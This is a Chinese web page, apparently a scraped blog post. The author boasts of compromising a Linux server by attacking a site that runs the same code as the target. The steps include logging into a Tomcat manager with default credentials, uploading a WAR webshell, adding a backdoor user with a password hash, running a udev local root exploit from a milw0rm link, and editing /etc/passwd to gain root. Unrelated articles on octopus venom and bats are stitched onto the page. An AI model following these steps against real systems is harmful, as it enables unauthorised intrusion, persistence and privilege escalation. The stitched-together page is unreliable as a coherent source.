迂回攻击战术搞定linux肉鸡心得

作者:小菜 更新时间:2025-03-16 点击数:
简介:今天成功利用udev搞定一个linux肉鸡,爽呀,没想到我的人品已经好到这个地步了 今天本来和ay520一起检测一个网站的,无奈网站太过去强大,没有发现漏洞,于

【菜科解读】

今天成功利用udev搞定一个linux肉鸡,爽呀,没想到我的人品已经好到这个地步了 今天本来和ay520一起检测一个网站的,无奈网站太过去强大,没有发现漏洞,于是我就开始了迂回攻击战术,什么是迂回攻击?我就来小介绍一下: 通常我们攻击一个网站的时候,由于不了解网站源码结构,也没有常见的漏洞,我们就可以先找出这个网站源码的一些特征字符,然后利用google搜索 和这个网站一样源码的站,要攻击的站可能没有漏洞,但是我们搜索到的站不一定没有漏洞,可能是配置上面的问题等,然后加以利用,成功得到shell以后 我们就可以利用shell来查看网站的源码,然后再返回去攻击目标站点,这样就是我所谓的迂回了,当然也可以是社工网站管理员在其它网站或者是论坛上面的 注册用户名和密码然后再回来测试目标站点,最终拿下目标站点就OK了。

费话不多说了,下面就开始我今天的入侵渗透之旅了 由于目标站点没有漏洞,配置上面的漏洞也没有,通过google搜索我找到一个和他一样源码的网站http://www.xxx.com:9999/wcm/loginpage.htm 然后进行了常用密码的 猜解,但是也没有发现弱密码等漏洞,于是去掉wcm以及后面的,直接http://www.xxx.com:9999/ 结果发现是tomcat ,经测试用户名和密码为:admin/null 成功进入以 后上传war木马,最后得到迂回攻击的网站的webshell 运行命令uname -a 得到服务器的内核版本Linux www.xxx.com 2.6.18- 128.el5 #1 SMP Wed Jan 21 10:44:23 EST 2009 i686 i686 i386 GNU/Linux 由于linux的2.6内核出了一个udev本地溢出漏洞,首先看一下webshell的运行权限,命令 id,结果人品爆发了uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=user_u:system_r:unconfined_t,是root权 限,既然是root权限,那么我们可以通过webshell来建立一个用户,然后利用putty来连接,进行本地溢出提权 但是通过常用的useradd username添加的用户密码 为空,如果想利用passwd username来设置密码的话,我们的webshell是无法输入密码的,我们就郁闷使用他的参数,-p来操作了,结果搜索运行如下命令:useradd - p $1$Bj.BPMBM$pr3Vte2A9DW6jCzljcZNT1 liang //-p 后面的一串字符串是我在虚拟机中添加用户,然后复制他的密码来做为这里的密码,这样我就成功添加一个用 户liang 打开putty 然后输入用户名和密码,连接,一切ok,权限为$ 为普通用户,下面就利用udev的溢出来进行提权了。

我本来按照此文所写来进行溢出 http://www.waitalone.cn/post/466.html 结果不成功,经查实,可能是溢出代码有问题,于是我就直接打开 http://www.milw0rm.com/exploits/8478 在putty中运行如下命令: [liang@www ~]$ vi test 粘贴上面的代码 [liang@www ~]$ wq 保存并退出 [liang@www ~]$chmod 777 test 添加任意用户可执行权限 [liang@www ~]$ps ax|grep udev|grep -v grep|awk {'print $1'} 获得udev进程号,结果为479,然后减1作为test参数 [liang@www ~]$sh test 478 结果返回 sh-3.2$ 返回这个说明不成功,我们多试几次 sh-3.2$ sh test 478 这样我试了三次,还是不行 sh-3.2$ sh test 476 这次成功了,我看到了可爱的#,哈哈 人品爆炸了 然后vi /etc/passwd 把用户名liang的 uid和gid改为0,这样liang 就为root 权限了,哈哈。

搞定收工!

迂回,攻击,战术,搞定,linux,肉鸡,心得,今天,

蓝环章鱼的毒性有多强:咬一口致人死亡?不轻易攻击人

章鱼是一种很美味的食物,它可以用各种方法来进行烹饪,比如酱爆、爆炒、凉拌、白灼等等。

我们人类能够吃的章鱼自然是没毒的,但是海洋中有一种章鱼的毒性非常强,即蓝环章鱼。

那么蓝环章鱼的毒性到底有多强呢?接下来大家就跟着小编一起去看看吧。

蓝环章鱼的毒性有多强蓝环章鱼的毒性非常强,被他咬上一口之后,在数分钟之内就会死亡。

基本介绍蓝环章鱼又被称为蓝圈章鱼、豹纹章鱼,很多人称之为世界上毒性最强的章鱼,它与方水母并称为海洋中最毒的两种物种。

由于它在遇到危险的时候身上的蓝环会闪烁,因此就被人们称为蓝环章鱼。

而且蓝环章鱼身上的颜色可以随意改变,它的毒素也可以通过身上的颜色表现出来。

蓝环章鱼喜欢吃小虾、小蟹以及一些受伤的鱼类,它们捕食的方式重要是通过毒素去麻痹自己的食物。

蓝环章鱼生性害羞,喜欢躲在石头下面,只有在夜晚的时候才会出来觅食和活动。

毒性强蓝环章鱼的毒性非常强,虽然说被它咬上一口并没有什么感觉,但是它体内的毒素发作之后可以在数分钟之内致人死亡,并且目前并没有解毒的方法。

虽然它的体型很小,但是它身上所携带的毒素可以在数分钟之内杀死26个成年人。

当我们被蓝环章鱼咬了之后,能够做的只有人工呼吸。

因此,在被咬伤之后,应该在第一时间内按住伤口并进行人工呼吸。

不会轻易攻击人类蓝环章鱼不会轻易地攻击人类,除非感觉到自己受到了威胁,而这些威胁重要是被人类从水中提起或者被踩到。

蝙蝠会主动攻击人吗 蝙蝠打死了会报复吗

蝙蝠会主动攻击人吗?在蝙蝠的世界里,它们是不会主动攻击人的,因为它们的智商非常高,而且还有一个特点,那就是它们的视力非常好,所以它们可以看到很很远的距离,这样就可以避免自己被人类抓住了。

不过在这个世界上,还有一种动物,它们的视力比蝙蝠还要好,甚至可以看到人类看不到的东西西,它们就是猫头鹰。

2020年7月30日,吉林省农安县十字街蓝天宾馆的居民李女士(化名)发出求助信息:“我们家楼道里有蝙蝠。

”据了解,蓝天宾馆是一栋老式居民楼,共六层,三楼以下为商户,四至六层为住户。

李女士说,她在这里是租的房子,与周围邻居并不熟悉,前天晚上9点左右下班回家时发现,一只蝙蝠钻进了六楼楼道里的墙洞上。

“墙上一共两个洞,我也不知道是怎么来的。

”李女士说,菜叶说说,目前她在楼道里只看见了一只蝙蝠,黑乎乎的,飞来飞去的。

“我也不知道这个蝙蝠会不会伤人,我下班回家挺晚的有时候,突然飞出来一只蝙蝠真是吓一跳。

”农安县林业局的一位工作人员表示,之前农安青山也出现了类似的事情,而且蝙蝠的数量比这个多,是一窝蝙蝠,他们也咨询的省里,建议居民把一些带有气味的消毒液放在楼道里,蝙蝠怕气味,可以在不伤害它的前提下将其驱赶走。

据了解,东北地区的蝙蝠大多是果蝠,以吃水果或者小昆虫为生,本身没有毒,一般不会主动攻击人,但作为野生动物,蝙蝠牙齿和爪子上携带狂犬病、鼠疫及其他病毒性疾病细菌。

因此,最好和蝙蝠保持一定距离,不要直接接触。

“如果蝙蝠误入房间,可开窗赶走,不要捉起来玩耍,或者把它们打死,以防其内脏、血液飞溅传播病菌,或者在挣扎时咬人。

”在此提醒市民,万一被蝙蝠咬、抓伤,要在24小时内尽快接种狂犬疫苗,及时就医。

来源:二三里资讯本期编辑:三三值班主任:梁爽声明:转载此文是出于传递更多信息之目的。

若有来源标注错误或侵犯了您的合法权益,请作者持权属证明与本网联系,我们将及时更正、删除,谢谢。

加入收藏
               

迂回攻击战术搞定linux肉鸡心得

点击下载文档

格式为doc格式

  • 账号登录
社交账号登录